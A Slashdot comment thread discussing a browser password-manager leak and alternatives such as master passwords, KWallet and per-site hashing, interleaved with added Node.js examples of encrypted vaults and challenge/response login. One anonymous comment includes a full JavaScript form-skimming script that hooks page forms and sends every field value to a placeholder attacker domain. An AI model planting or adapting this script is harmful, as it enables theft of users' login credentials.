In KDE, the KWallet application allows you to use a single master-password to store/encrypt all these lower-priority passwords. This is slightly less convenient, but is much more secure. When you start browsing in Konqueror and encounter a password field, KWallet pops up, you enter your master-password and it fills in the password fields for you. You also set a timeout if you want (the wallet "stays open" for some amount of time, so you don't have to re-enter the master password too often). Without the master password you can't unlock (or even decrypt) all the other passwords. With only one password to remember, it's reasonably convenient. Probably there are similar apps available for OS X and Windows? In any case what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password."
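The comments above turn on whether saved logins are encrypted under a key that only the user supplies. The following is an added example (not code from Firefox, Opera or KWallet) of that design in Node.js: the key is derived from the master password with scrypt and the login list is sealed with AES-256-GCM. The function names and the sample logins are constructed for illustration.

```javascript
const crypto = require('crypto');

// Constructed sample data; no real accounts.
const SAMPLE_LOGINS = [
  { site: 'https://forum.example', user: 'alice', password: 'hunter2-constructed' },
  { site: 'https://shop.example', user: 'alice@mail.example', password: 'another-constructed-pw' },
];

// scrypt is deliberately slow and memory-hard, so each offline guess at the
// master password is expensive for someone who copied the vault file.
function deriveKey(masterPassword, salt) {
  return crypto.scryptSync(masterPassword, salt, 32);
}

// Encrypt the whole login list. Only salt, IV, auth tag and ciphertext are
// written out; neither the master password nor the derived key is stored.
function sealVault(masterPassword, logins) {
  const salt = crypto.randomBytes(16);
  const iv = crypto.randomBytes(12); // fresh nonce on every save
  const cipher = crypto.createCipheriv('aes-256-gcm', deriveKey(masterPassword, salt), iv);
  const ciphertext = Buffer.concat([
    cipher.update(JSON.stringify(logins), 'utf8'),
    cipher.final(),
  ]);
  return {
    salt: salt.toString('base64'),
    iv: iv.toString('base64'),
    tag: cipher.getAuthTag().toString('base64'),
    ciphertext: ciphertext.toString('base64'),
  };
}

// Decrypt; throws if the master password is wrong or the file was modified,
// because the GCM authentication tag will not verify.
function openVault(masterPassword, sealed) {
  const key = deriveKey(masterPassword, Buffer.from(sealed.salt, 'base64'));
  const decipher = crypto.createDecipheriv('aes-256-gcm', key, Buffer.from(sealed.iv, 'base64'));
  decipher.setAuthTag(Buffer.from(sealed.tag, 'base64'));
  const plaintext = Buffer.concat([
    decipher.update(Buffer.from(sealed.ciphertext, 'base64')),
    decipher.final(),
  ]);
  return JSON.parse(plaintext.toString('utf8'));
}

// Convenience wrapper: null instead of an exception on a failed unlock.
function tryOpenVault(masterPassword, sealed) {
  try {
    return openVault(masterPassword, sealed);
  } catch (err) {
    return null;
  }
}
```

This protects the file at rest from other programs running as the same user; once the vault is unlocked, the decrypted logins are in the browser's memory and the page-script issue from the article still applies.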

Re:Firefox password manager (1)

kebes (861706) | more than 5 years ago | (#19926949)

what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password."
To clarify (before someone points out my mistake!): I see that Firefox has a "Set Master Password" option in the Security settings. What I should have said was:

what I would like to see is Firefox switch to this kind of password manager--where the passwords are all encrypted with a "master password" in the default configuration.

Re:Firefox password manager (1)

Eric Pierce (636318) | more than 5 years ago | (#19926951)

"It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same."

Exactly. For example, something like System Info for Windows [gtopala.com] EP

Password Managers and Simple Passwords (5, Insightful)

andrewd18 (989408) | more than 5 years ago | (#19926779)

On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.
Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password. The only thing stopping people from using simplistic passwords is the quality of the IT department's restrictions. I bet every salesperson in my office would use "gocubsgo" as their password if our IT department didn't demand at least one capital letter and a number. As such, their passwords are now "goCubsgo2007".

Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."

Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.

I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.

Re:Password Managers and Simple Passwords (2, Insightful)

Otter (3800) | more than 5 years ago | (#19927115)

Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password....Don't tell me that an in-browser password manager stops people from using the same password everywhere.

You're right. The real advantage of the password manager is that it's the only reasonable alternative to writing down all of those unique, complex, constantly changing passwords.

Re:Password Managers and Simple Passwords (1)

klenwell (960296) | more than 5 years ago | (#19928087)

I don't know how reasonable this is as an alternative (it won't work for most LAN/desktop situations), but this is what I use for logins to internet sites that aren't a high security concern for me:

http://mushpup.org/ [mushpup.org]

I rolled this myself and it runs all client-side with javascript (both the cause and solution to all life's problems?). If you were concerned about the security of a third-party site (as you should be -- though this is safe) you could roll your own pretty easily and stick it on your own public site.

It's handy because I can just add a reminder to the profile page that most sites offer. And it makes my password for the site easily available where I have an internet connection. (Though it does require visiting the mushpup site and entering the info there and then pasting it back to site I want to log into.)

My slashdot password: m{this.domain/this.user}

Re:Password Managers and Simple Passwords (1)

joeljkp (254783) | more than 5 years ago | (#19927699)

That's the fundamental flaw with passwords: people have to either remember them or store them somewhere, which leads to weak, easy-to-remember passwords or insecure storage systems.

When's biometric security coming for the web? Scan my fingerprint to log into Slashdot?

Re:Password Managers and Simple Passwords (1)

Beryllium Sphere(tm) (193358) | more than 5 years ago | (#19928033)

>Don't tell me that an in-browser password manager stops people from using the same password everywhere.

That depends on the password manager. Firefox's password manager doesn't automatically create different passwords per site, but the pwdhash extension does. It hashes the site name with a master password to create a strong and site-specific password. There are several extensions that do this but pwdhash is my favorite.
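Both this comment and the mushpup one above describe deriving a per-site password from a master secret and the site name. The following added example shows the general idea in Node.js; it is not the pwdhash or mushpup algorithm, and the salt label, output length and function names are assumptions made for illustration.

```javascript
const crypto = require('crypto');

// The site identity is the hostname the browser is actually on, taken from
// the parsed URL (lower-cased by the URL parser), not from text on the page.
function siteKey(pageUrl) {
  return new URL(pageUrl).hostname;
}

// Derive a 20-character password for one site. scrypt makes it costly to
// work backwards from one leaked site password to the master password.
// 'site-password-v1:' is a constructed domain-separation label.
function sitePassword(masterPassword, pageUrl) {
  const salt = 'site-password-v1:' + siteKey(pageUrl);
  return crypto
    .scryptSync(masterPassword, salt, 15) // 15 bytes -> exactly 20 base64 chars
    .toString('base64')
    .replace(/\+/g, '-')
    .replace(/\//g, '_');
}

// Constructed demonstration inputs.
function demo() {
  const master = 'constructed master passphrase';
  return {
    forum: sitePassword(master, 'https://forum.example/login'),
    bank: sitePassword(master, 'https://bank.example/login'),
    // A look-alike host gets a different password, so a password typed on a
    // spoofed host is useless on the real one.
    lookalike: sitePassword(master, 'https://forum.example.evil.test/login'),
    // Same host, another user's page: the derived password is identical.
    // Per-site derivation limits reuse across sites; it does not separate
    // pages that share one hostname, which is the case the article describes.
    sameHostUserPage: sitePassword(master, 'https://forum.example/~otheruser/page.html'),
  };
}
```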

Alternatives (0)

Anonymous Coward | more than 5 years ago | (#19926793)

Use something like PasswordSafe (http://passwordsafe.sourceforge.net/) to store your passwords.

This is the best (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#19926801)

That's like saying someone always puts earth first. Knowing local legislative has always given readily independent analysis doings. Vacuum orders load down ever man offering republicans testimonies. Knowledge in locals locations has evermore influence on the environment. It makes sense if you look at the details.

OpenID (1)

shmert (258705) | more than 5 years ago | (#19926909)

Sounds like the exploit relies on auto-enter password fields for a domain, and then using javascript to transmit the value of the password field to the attacker's machine. So, not so much a coding error as a flaw in the thinking that any password field on a site should be auto-filled in. Requiring some action on the part of the user would help with this, but a better solution would be to move to openID [openid.net].

Safari?? (1)

Pope Raymond Lama (57277) | more than 5 years ago | (#19926913)

Can someone confirm if Safari is actually vulnerable, or if it is just that the author thinks that "all open source browsers are just the same"?

I tried it with Konqueror and default KDE 3.5 password saving technology, and no password leaked this way. I wonder if Safari would have problems there.

Master Password? (1, Interesting)

Anonymous Coward | more than 5 years ago | (#19926931)

I wonder why they didn't mention the "Master Password" feature of the password manager. Every time the password manager activates, it prompts you to type in a single master password. This should be effective in preventing any password harvesting, save for any other bugs that the manager might have.

My Password Manager is My Brain (1)

organgtool (966989) | more than 5 years ago | (#19926957)

It's things like this that force me to disable Password Manager altogether. If only one security hole exists in Password Manager, someone would be able to grab passwords to my bank account, credit card, e-mail, and more. It's a lot harder for the hackers to get the passwords when the only place they are stored is in my head.

With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements. I wish there would be an official standard for secure passwords so that I could reliably use one password for most of my accounts. Of course, that would also be a security risk because if someone got that password, they would have access to most of my accounts, but that's a separate issue.

Re:My Password Manager is My Brain (1)

kebes (861706) | more than 5 years ago | (#19927003)

It's things like this that force me to disable Password Manager altogether. ... With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements.
Well my solution is to be selective about what passwords get saved. Low-priority things like slashdot and forum logins are fine for password managers. However I memorize, never write down, and never save passwords for financial sites. This keeps the number of "must-be-memorized" passwords down to a manageable level.

Password managers are not an "all-or-nothing" tool. Use them where they make sense.

Use the Secure Login FF Extension (3, Informative)

EMR (13768) | more than 5 years ago | (#19927069)

By using this extension, the security hole is fixed. Just have to wait around for FF to implement it natively.
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).

https://addons.mozilla.org/en-US/firefox/addon/4429 [mozilla.org]

Challenge/Response (3, Insightful)

oldmacdonald (80995) | more than 5 years ago | (#19927279)

The "right" solution is to have a challenge/response protocol where your secret key is never sent out of your computer at all. The current password situation is a huge mess since you need a different password for every site or risk one compromised trusted site giving away your password to everything. Most users, even when using a password manager, aren't going to have unique passwords for every site, let alone strong ones. It wouldn't surprise me at all if such a protocol already exists in the HTML standard. It certainly should.

The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.
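The exchange this comment asks for, sketched as an added example in Node.js with both sides shown (it is not an existing browser or HTML feature, and the class names and origins are constructed). The server stores only a public key, the private key never leaves the client, and the signed message includes the origin so a response cannot be reused on another site.

```javascript
const crypto = require('crypto');

// What gets signed: the origin the client believes it is talking to,
// followed by the server's random challenge.
function signedMessage(origin, challenge) {
  return Buffer.concat([Buffer.from(origin + '\n', 'utf8'), challenge]);
}

class Server {
  constructor(origin) {
    this.origin = origin;
    this.publicKeys = new Map(); // user -> public key; nothing secret is stored
    this.pending = new Map();    // user -> outstanding challenge
  }
  register(user, publicKey) {
    this.publicKeys.set(user, publicKey);
  }
  issueChallenge(user) {
    const challenge = crypto.randomBytes(32);
    this.pending.set(user, challenge);
    return challenge;
  }
  verifyResponse(user, signature) {
    const challenge = this.pending.get(user);
    const publicKey = this.publicKeys.get(user);
    this.pending.delete(user); // each challenge is single-use, so replays fail
    if (!challenge || !publicKey) return false;
    return crypto.verify(null, signedMessage(this.origin, challenge), publicKey, signature);
  }
}

class Client {
  constructor() {
    const { publicKey, privateKey } = crypto.generateKeyPairSync('ed25519');
    this.publicKey = publicKey;   // sent to the server once, at registration
    this.privateKey = privateKey; // stays on the user's machine
  }
  // The client signs the origin it is actually connected to.
  respond(origin, challenge) {
    return crypto.sign(null, signedMessage(origin, challenge), this.privateKey);
  }
}

function runDemo() {
  const site = new Server('https://forum.example');
  const alice = new Client();
  site.register('alice', alice.publicKey);

  const c1 = site.issueChallenge('alice');
  const sig1 = alice.respond('https://forum.example', c1);
  const firstLogin = site.verifyResponse('alice', sig1);
  const replayed = site.verifyResponse('alice', sig1); // challenge already used

  const c2 = site.issueChallenge('alice');
  const sig2 = alice.respond('https://forum.example.evil.test', c2); // signed for another origin
  const wrongOrigin = site.verifyResponse('alice', sig2);

  const unknownUser = site.verifyResponse('bob', sig1);
  return { firstLogin, replayed, wrongOrigin, unknownUser };
}
```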

The solution is simple (0)

Anonymous Coward | more than 5 years ago | (#19927317)

This exploit exists for the simple reason that the program which has access to the stored passwords is also the same program that's rendering html and processing javascript and interpreting css and everything else.

Simply store your passwords in a separate program. E.g., Password Gorilla (http://fpx.de/fp/Software/Gorilla/). Then it is a simple matter to use the clipboard to copy the user id's/passwords over to the browser login forms (Password Gorilla makes this a simple right-click operation).

Then disable the browser integrated password manager. If the browser stores no passwords, it can not leak passwords.

Another advantage is that Password Gorilla also includes a strong password generator, so you can generate very good passwords (and use different ones for different sites) and thereby increase your security.

It also runs on both Win and Linux, from the same data files.

It also includes a "merge" functionality so you can keep changes synced between different files (desktop/laptop, etc.).

My Solution (2, Interesting)

fast turtle (1118037) | more than 5 years ago | (#19927383)

While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.

In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and customer service that they've reduced the value of their business to me by not accepting secure passwords and that I will no longer deal with them except by a cash-n-carry basis. A few of them have responded positively and after some effort have increased their password security by allowing special characters and thus they've gained an increased level of business from me along with the positive word of mouth advertising to my friends and associates.

Fanboi Fix. (1)

Frankie70 (803801) | more than 5 years ago | (#19927451)

Who found the bug? Can we commission a hit on him?

Ok, I take that back. Forgot this is Firefox, not Safari.

Maybe I'm doing something wrong (or right...) (1)

Vokkyt (739289) | more than 5 years ago | (#19927517)

But I can't seem to get the Browser Check to pull passwords on Safari 2.0 or Mac/Win Firefox with all three using password manager. Is there a specific way that the password manager/auto-fill needs to be set up in order to pull the data?

IE, is this more FUD-ey stuff that is very situational than practical?

Hm.. (1)

Zekasu (1059298) | more than 5 years ago | (#19927541)

The vulnerability only stems from the fact that Firefox puts the passwords into the box.

There is no workaround for this.

So, if you're that worried about your passwords being stolen, don't use the password manager. If you're worried about burglars, close your window and add some bars. Better yet, get rid of the window altogether.

Kwallet (1)

LuSiDe (755770) | more than 5 years ago | (#19927655)

From the Kwallet handbook [kde.org] (a KDE utility; GNOME has equiv.): The wallet subsystem provides a convenient and secure way to manage all your passwords. I'm not sure if this can be done automatically (integrated in browser) but manually, using a master key/password, it is a good way to store passwords for those with Alzheimer or other memory trouble. One could even use GPG/PGP or TrueCrypt (or LUKS/GELI etcetera) as 'wallet'. As long as you can remember/have the master key it's more secure and reliable than (sticky) papers, or a plethora of passwords to remember, or using the same password for various purposes. Just make sure you have this data backed up.

which sites are affected? (1)

psyced (1116901) | more than 5 years ago | (#19927761)

does anyone have a list of sites which are likely to let third parties insert js code?

would myspace, popular for being visually "hackable", or facebook be affected? facebook in particular lets you add 3rd party extensions to your profile. would those extensions be able to add appropriate js code to extract your facebook password from your firefox password manager?

Not a Password Manager issue at all (0)

Anonymous Coward | more than 5 years ago | (#19927783)

Ok, I just RTFA (odd for an Anonymous Coward, I know) but the issue here is not with Password Manager at all. It has to do with community portals allowing people to spoof login pages. It's basic phishing 1.0. Yes, a script could be "injected" to secretly read and report back the issues. But this isn't new to Firefox. The problem is "community sites" that let *ANY MORON CREATE CONTENT* without putting proper safeguards in to stop this kind of abuse. It's not the browser's problem that site admins are too stupid to stop this crap. Any site stupid enough to let me inject scripts into a page gets what they deserve. Hell, I could write a script that works with any JavaScript enabled browser back to Netscape 3.0 to do this. Hell, I can grab any form information if I really want.

In fact, here you go: //written on the fly with no testing.

function stealFormInfo() { //because vbscript is the most evil server-side language ever.
      var stolenInfo = 'http://wwww.myevildomain.com/myevilscript.asp';
      a = 0; //grab every form element
      for (elementname in this.elements) { //and add the name value pair to a querystring.
            stolenInfo += (a)?('&amp;'):('?');
            stolenInfo += elementname + '=' + urlencode(this.elements[elementname].value);
            a++;
      } //fire away
      var sendMe = new Image();
      sendMe.src = stolenInfo; //and return the default onsubmit result (if any)
      return this.oldonsubmit();
}

function doNonthing() { //dummy function.
    return true;
}

if (document.onload) { //hold onto any previously set onload method
    document.oldonload = document.onload;
}
else { //use dummy function instead
    document.oldonload = doNothing;
} //set my own document onload script to set up my form stealing.
document.onload = function setTrap() { //find any forms on the page.
    for (formname in document.forms) {
          if (document.forms[formname].onsubmit) { //hold on to any form's previously set onsubmit method
              document.forms[formname].oldonsubmit = document.forms[formname].onsubmit;
        }
        else { //or use the dummy function
            document.forms[formname].onsubmit = doNothing;
        } //set my own onsubmit method.
        document.forms[formname].onsubmit = stealFormInfo;
    } //fire the previously set onload function (if any);
    document.oldonload();
}

Don't trust embedded Javascript? (1)

Ythan (525808) | more than 5 years ago | (#19927855)

Why not place security restrictions on embedded Javascript? Any website developer worth his or her salt already puts all Javascript in external files. Don't allow embedded Javascript to read password fields or cookies and you make an attacker's job much more difficult. Or so it would seem to me, anyway.

Excuse me (0)

Anonymous Coward | more than 5 years ago | (#19927941)

How about the fact that IE still doesn't even have a passwd manager or any protection for your passwords at all.

Do not use password managers (2, Interesting)

Monsieur_F (531564) | more than 5 years ago | (#19927951)

the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.

I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionally want to log from another computer, for some urgent matter, you cannot find what your password was!

On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).

Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.

Not my problem (1)

LordSnooty (853791) | more than 5 years ago | (#19928093)

Who on Earth uses the password save feature and expects it to be safe anyway... I mean, come on. I keep my password manager on my USB stick, using a program that doesn't communicate with the network. I don't keep them in the program that will also talk to the site I want to log into. Too much danger that info will leak or a way in will be found... well, whaddayaknow.

Hackproof system (1)

hoppo (254995) | more than 5 years ago | (#19928129)

I have a hackproof system for password management. It's called a "brain." I remember my passwords, then I retrieve them from memory when I need them.